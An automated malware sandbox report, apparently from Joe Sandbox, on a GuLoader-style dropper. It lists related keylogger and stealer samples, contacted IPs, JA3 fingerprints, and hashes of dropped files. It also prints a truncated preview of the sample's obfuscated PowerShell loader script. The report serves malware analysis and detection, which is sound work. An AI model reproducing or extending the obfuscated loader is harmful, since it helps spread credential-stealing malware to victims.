                                                                                                                                    Company catalog profile.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    api.telegram.orgBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    TELEGRAMRUBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    file.exeGet hashmaliciousAilurophile StealerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    CLOUDFLARENETUSBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 188.114.97.3
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    https://2kio0wi0iat.freewebhostmost.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 104.18.11.207
                                                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                    • 188.114.97.3
                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 188.114.97.3
                                                                                                                                    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    • 104.21.4.93
                                                                                                                                    MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    ORACLE-BMC-31898USBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 193.122.130.0
                                                                                                                                    Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    Company catalog profile.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    Quote GVSE24-00815.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    Payment_transaction.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 158.101.44.242

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    Benefit Enrollment -wZ5nusm.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                    • 188.114.96.3
                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eBOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Towered.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    quote001.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    37f463bf4616ecd445d4a1937da06e19BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    Quote specification and BOQ.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    Towered.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    REPLY TO NOTICE GST DRC-1A_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33
                                                                                                                                    HnKaJYxoTj.htaGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.23.110
                                                                                                                                    • 142.250.186.33

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):14744
                                                                                                                                    Entropy (8bit):4.992175361088568
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                                                                    MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                                                                    SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                                                                    SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                                                                    SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aifm5oe.3y4.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_absp4bu5.fcj.ps1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lre33tyz.0jh.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzwiu1un.rar.psm1

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Melodiseres\Banakite.Tor

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):335115
                                                                                                                                    Entropy (8bit):7.6689874969092156
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:1/SB07KhxjHW4e7EFTKegm9JU3Kbls+BFRylanut:tSB8SaHEcnm9G3+swSlana
                                                                                                                                    MD5:82FEC85CA061EB5F2F6F249EFA179539
                                                                                                                                    SHA1:5C66653C3D0CED5CF381A2CBCF2FD71A3EE5FDC4
                                                                                                                                    SHA-256:8BFB0B50216B8E379ADBE03D7DBBD36EF83686899F0E372314558B6AEB25D648
                                                                                                                                    SHA-512:4C9345B5FA544625DD4A16C3FC8AADD230C30D5491261493E12B18DF9ACAC77623C42B933D2D3483A3D56F9455D53DAB0739694B68D46B344E6A528BDC211CAF
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:..t.S.88........!..........>......................../............R..................,...(.............ZZ.............~.................j........{{{{{.....555...\....uuuu......--.............H...U..............{......................S.........ZZ................................nnn..._.................................S............P...........".v..............q........................a.....{.........................................................U...p.........HH......&&&....!!!!........##...........................KK.I.....7............................a..........EE.........................v............\\\\\\.>.............e.....................i.s....".........6666........................;.$$......1...__...........PP......>........;;;...D.......................................II....oo..................lll..............|..E.....................5...........GG.f..................p.T./.....s...X.....................................................NNN..fffff.e..uuuuuu....zzzzz.bb..e. ........

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):807711
                                                                                                                                    Entropy (8bit):7.595149385038169
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:pe8o3x64EvUa/AWpUyqVMjmtEatY9j4WT2jwl4TODIY703VBJ8k5bCqU:peRx5Ev9VpU5xh7wOqsY7G8kAqU
                                                                                                                                    MD5:39550A5532AF152DF27A096508A0D4E2
                                                                                                                                    SHA1:45317173C2771B28460DC4A473C2532983977DE1
                                                                                                                                    SHA-256:41B359E55E25D9F92E6F4EA1B88B3CFE7C6CA962075A60AC9417548AD190C41E
                                                                                                                                    SHA-512:E4295D86586ABD85284E43A7CE1A726F2EA3CAA7E55699D9F2C70D72883DC31E6C6A0B2C6506B986F99911109EA42EE94A4A02E09CDC0E26591AAD55F336A866
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h...........3............@..........................@............@..............................................*...........................................................................................................text...'f.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata.......P...........................rsrc....*.......,..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe:Zone.Identifier

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:true
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\termineret.for

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):253866
                                                                                                                                    Entropy (8bit):1.2540914296108432
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:R+P6ynhQw6ePQ66TpqOQMTpJjOrAl09oKnP9i4TrxFvsjugb0CrDee8PVd1dl3hb:RkJTn6rD+1fURQCryFT7PZLTuEm
                                                                                                                                    MD5:6A58E51F862B68E1512139BA57FC966D
                                                                                                                                    SHA1:3D99C296E26381D3039A43596B346E38733F512B
                                                                                                                                    SHA-256:62B9CA6B988C819D7FD11C2D73D6A7634B80989CC129A184F0177BB1DB391DF3
                                                                                                                                    SHA-512:DDF4D586DEDF8FC9DD0D5668DD79AE1231F80EEA36E51F2B67FC07E14F9488B797B010FEA1B67672A704857449BDF2597A86D3791012393BF7637858F1B3B76B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:......................G...)....................................................................................D5...............R........./........................3.....1................s......G.......-...........n.....}...................................................................................................X............1.......................................7............................................................................................................................._...........s.............................................6...%...................................<..........................y............................y....................................p............................................................................................is........................................$...................................... .........$..........................|............................................................Z.........m...........................

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    File Type:ASCII text, with very long lines (4127), with CRLF, LF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):70432
                                                                                                                                    Entropy (8bit):5.168755390422434
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:LZFn+dBMM3Js/oCR9RrnfytTYQYpBW5mSTq2egK+JSnQDQRb:LZFUWkkXR9dfMMRDSTq2e3QcRb
                                                                                                                                    MD5:433B637E00993C25FF9C0E99137A4FE9
                                                                                                                                    SHA1:3C05C4C44C1ED87B6616540C29D6BF6E460F6CFF
                                                                                                                                    SHA-256:F7297C998E655734E779D3A4B699E8E0B58D263104850A18536628EF4BCFB344
                                                                                                                                    SHA-512:311C8CFB5E3A2B90CAE3F07C38216B43FB6652301F4013BC2283AE32F8FBB420E862A27CCCA9C435C6C0B655514958EA8C2B0AF40D491954F7AD506ACEF9A2CD
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:$Vivisectionists=$Spearlike;..<#Csaren Forvoldte Tudekopperne chimpanzee #>..<#Skotjsfabrikker Kerstin patroon Bardunstrammer #>..<#Peasants Rigstrnernes Referencemaalinger #>..<#Selvsikkert Uninferentially Deltransformationerne #>..<#Aluminiumfoliet Savation Tangoreceptor #>..<#Pasquinader Uncatholicizing Undseelig Pyophthalmia Infrapose Mouillure #>...$Axle = @'.Biliste.Mahogon$MusikerM rapanoSpoo isnLeopardo HairspcDriftssy RompeecRattlesl Soyle eBesette=Lim jor$ StrygeUTndeba nAccusekdMermaidi ScarlapCandl shCa etsntsuperafhDuniasuoDesignonKu.leflgTalterci Ulidelz Preal eSolsmass A.ghan;Present.Lapn ngfVejrsatuPhenylbnAvanti,cFormlhatKapita,iMediteroHypapann Kl mpf UdsalgsHPlatymio GeltrevHaandhveAussilddSocialbdUnbloodeSynod ilKlvekoceKon entsVm,else Arterne(Taarnhj$AnthropC,ypecouaF rmaaltSvk elsenonlibecPulpwoohInhrenti fvrgemsPondokkt B deomsElselsk,Kalvenc$ Utzo,kF Unhypoo nimater SiddemkRebeccalS,ampeva Knud rrBesmeare iggevolAngoisesUnreso.eBeseechsPist lv4Alterni0atriumh)A

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Thyrididae.cyl

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):353573
                                                                                                                                    Entropy (8bit):1.2458773676306705
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:62pIMYQY2UpRwwMZ+1aHbp5ZbqSuhWQ1cmb3pFLH2Q7q+/OF6XiZ6Gd2CgxSTwZU:98ej762aCDFFiKN8NOKv
                                                                                                                                    MD5:3693D1C5423ED5485ADD548B39408E81
                                                                                                                                    SHA1:E786C94065A2B752EFA9012EE03A60354F4823E8
                                                                                                                                    SHA-256:BA64800B69B1648E4A5D3C52AE0D33CFA2DFC7DD1F0F8F9243F65BDFD6ACFBEB
                                                                                                                                    SHA-512:E3BEF3CDA2991B8512D638735766E735280551D1522F9B9213664C22B2B3148DF3F3EF554D2B6A46F63D2D19FEF674CA1182CA8671A970BA992114201C69DC4C
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:................................................*.................e............I_.............0.......................................E...............l...........s..................I................A.......................................................O..............................................................T..........#...................O..........................T.........................@..........................................{............................................................I........................L...........M..............k.......................q................................................................h................Z.......................................9.....................................0.........................^..............................................b.!.....................................................................B.............................................\..R..*.................{................9.........................\

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\nskvrdigste.had

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):407070
                                                                                                                                    Entropy (8bit):1.25666846507551
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:I130o3eC9ofFCnYXjzHKyLTWXA8YxJ1ZE6xnz/M:IB3eddcYXHHaw8+DRzk
                                                                                                                                    MD5:0938BE94531932AB7BE23268164C4B8D
                                                                                                                                    SHA1:558B0F7EACFF3B6A25E026618ED8E837B784B9D3
                                                                                                                                    SHA-256:B3580AD5E5ACD9167E64EDDB2133A817B253BE860F0C80788900540002C5577E
                                                                                                                                    SHA-512:01206D94762F9BCC868BF22ABFD0A71B55A8CA393EE5A97F4C08607970C5FA0A742534DFCCF91B83875E10F40B9F3F87D569A752AF829514FE7F7B43A92F9C60
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:....................................0..6..........................Y.........E..............................................................5......u.........................................5.....................Q..8................................................................!..p..................A..?.......&....1....p............................................................z.............................[...................................................(.................G..................O....5.. .......+...........c...........................................P.........jb........................................................................................................v............................+............................z.....................................................).....................F....................................!......................................................................................................~..............>............Z......t

                                                                                                                                    C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\pin.jpg

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe
                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 702x488, components 3
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26217
                                                                                                                                    Entropy (8bit):7.921169152406737
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:3+J5oOfOX4FW08ZWXGAdKMNtdXD6Ajnz/:3+JGX4Fp8ZWWAdnNtdzdjnL
                                                                                                                                    MD5:47F1C883097BE8A7F4E406DBAA7FCA71
                                                                                                                                    SHA1:011DFAD8DE93980BFED3DA01D30A0C8F6D2B85D6
                                                                                                                                    SHA-256:E68D0A4A0C9361F7761761D0482858D8BAEF7607072A5F118E8B4CD0F3E9E80B
                                                                                                                                    SHA-512:E018524FF8102511D381AA4AFFF384A723E6AAD692653073EA14EA6105A6125A2E742B92FB139776C6465B6A52FFC425B1F230428760885240BF4E8F5A34803D
                                                                                                                                    Malicious:false
